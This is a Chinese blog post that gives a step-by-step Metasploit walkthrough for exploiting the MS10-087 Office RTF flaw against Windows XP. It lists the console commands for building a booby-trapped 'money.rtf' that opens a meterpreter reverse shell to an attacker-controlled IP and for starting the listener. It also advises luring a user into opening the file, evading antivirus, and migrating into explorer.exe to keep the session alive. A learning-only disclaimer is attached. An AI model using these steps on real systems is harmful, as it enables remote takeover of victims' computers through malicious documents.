zoukankan      html  css  js  c++  java
  • MS10-087微软OFFICE漏洞【参考拿机模拟】

    声明:以下测试仅仅为了学习用途,模仿尝试与博主无关
    工  具:metasploit
    目标机:windows xp sp3 
    步骤:
    1、使用msf创建特殊代码的doc文档
    命令:
    msfconsole 进入metasploit控制台
    msf > use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof   //调用ms10-087模块
    msf  exploit(ms10_087_rtf_pfragments_bof) > set PAYLOAD windows/meterpreter/reverse_tcp  //设定攻击载荷为反弹TCP连接会话
    msf  exploit(ms10_087_rtf_pfragments_bof) > set LHOST 192.168.1.129  //设置反弹连接目标IP
    msf  exploit(ms10_087_rtf_pfragments_bof) > set LPORT 8080                 //设置反弹连接目标端口号
    msf  exploit(ms10_087_rtf_pfragments_bof) > set FILENAME money.rtf     //创建的word文档名称为money.rtf,格式必须是rtf,一会儿我们再把它改名为.doc也是可以正常执行的。
    msf  exploit(ms10_087_rtf_pfragments_bof) > exploit     //生成带攻击代码的word文档

    2、渗透主机上开启msf监听80端口等待meterpreter的反弹会话
    命令:
    msf  exploit(ms10_087_rtf_pfragments_bof) > use exploit/multi/handler
    msf  exploit(handler) > set LHOST 192.168.1.129
    msf  exploit(handler) > set LPORT 8080
    msf  exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
    msf  exploit(handler) > exploit
     
    3、将文档放置到目标机并启动。(一旦用户打开该文档我们即可获得目标主机权限)
    【这一步是个难点:1.如何将文档引诱用户下载 2.如何对该文档免杀】
    需要注意的是对方一旦打开word文档看到没什么东西,关闭掉word文档的话我们的会话就断开了,所以应该在获得反弹后首先把反弹连接迁移到一个不容易被用户关闭的进程中去
    PS 查看目标主机进程,我们可以使用explorer.exe ,查看其PID
     
    4、执行:migrate explorer进程ID
     
    参考http://blog.sina.com.cn/s/blog_4c86552f0102wlao.html
  • 相关阅读:
    gcc 使用中常用的参数及命令
    Android build system & Android.mk 规范
    ndkgdb对java/native code联合调试
    Android NDK开发指南(一) Application.mk文件
    字符编码知识:Unicode、UTF8、ASCII、GB2312等编码 及 转换
    C & C++ 中值得注意的编译,链接,调试,错误及其原因
    JNI 调用规范
    Graphic 矢量图形的区域填充与缠绕规则
    Android NDK开发指南(二)Android.mk文件
    JNI 之二 :java & c/c++ 相互通信及调用
  • 原文地址:https://www.cnblogs.com/A--Q/p/6243069.html
Copyright © 2011-2022 走看看